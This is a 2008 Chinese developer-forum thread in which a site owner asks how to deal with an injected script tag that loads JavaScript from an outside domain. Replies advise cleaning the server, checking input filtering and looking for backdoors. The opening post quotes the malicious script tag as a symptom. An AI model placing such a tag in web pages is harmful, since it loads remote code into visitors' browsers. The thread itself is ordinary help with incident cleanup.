网站被注入

cannycsy 2008-04-07 10:40:16
网站被注入

<script src=ht<script src=http://www.414151.com/fjp.js></script>

怎么解决?
...全文
201 11 打赏 收藏 转发到动态 举报
写回复
用AI写文章
11 条回复
切换为时间正序
请发表友善的回复…
发表回复
fanadong 2008-04-07
  • 打赏
  • 举报
回复
[Quote=引用 4 楼 gaopeng1988 的回复:]
没遇到过

了解 了解
[/Quote]
cannycsy 2008-04-07
  • 打赏
  • 举报
回复
现在看到网页文件一点都没变,只是SQL数据库加了两个表,表里就这些连接地址,我把表内容删除了.但再看网页,这些连接还是在,搞不明它是怎么连接过来的.烦啊.
SYUEHOKO 2008-04-07
  • 打赏
  • 举报
回复
直接去掉没有用的.还是要杀毒..找出来才行.
sun_Ke 2008-04-07
  • 打赏
  • 举报
回复
服务器杀毒
qiyousyc 2008-04-07
  • 打赏
  • 举报
回复
服务器被感染病毒了
syc958 2008-04-07
  • 打赏
  • 举报
回复
在服务器上直接去掉就可以了!
gaopeng1988 2008-04-07
  • 打赏
  • 举报
回复
没遇到过

了解 了解
lovehongyun 2008-04-07
  • 打赏
  • 举报
回复
同情..
datahandler2 2008-04-07
  • 打赏
  • 举报
回复
你的服务器应该是感染病毒,然后病毒往你的网站页面写入那那个脚本吧。如果是病毒性写入,只能这样了:服务器清毒,手动删除被写入的脚本。
如果是从输入框中输入那个脚本引用。那你就要检查下你是不是有有效的过滤。或进行加码解码注意:编辑器控件特别是论坛的UBB也是可以嵌套恶意脚本。
royrandy 2008-04-07
  • 打赏
  • 举报
回复
杀毒,看看是否网址有后门
cannycsy 2008-04-07
  • 打赏
  • 举报
回复
谢谢上面的朋友, 重装了系统了.

62,046

社区成员

发帖
与我相关
我的任务
社区描述
.NET技术交流专区
javascript云原生 企业社区
社区管理员
  • ASP.NET
  • .Net开发者社区
  • R小R
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告

.NET 社区是一个围绕开源 .NET 的开放、热情、创新、包容的技术社区。社区致力于为广大 .NET 爱好者提供一个良好的知识共享、协同互助的 .NET 技术交流环境。我们尊重不同意见,支持健康理性的辩论和互动,反对歧视和攻击。

希望和大家一起共同营造一个活跃、友好的社区氛围。

试试用AI创作助手写篇文章吧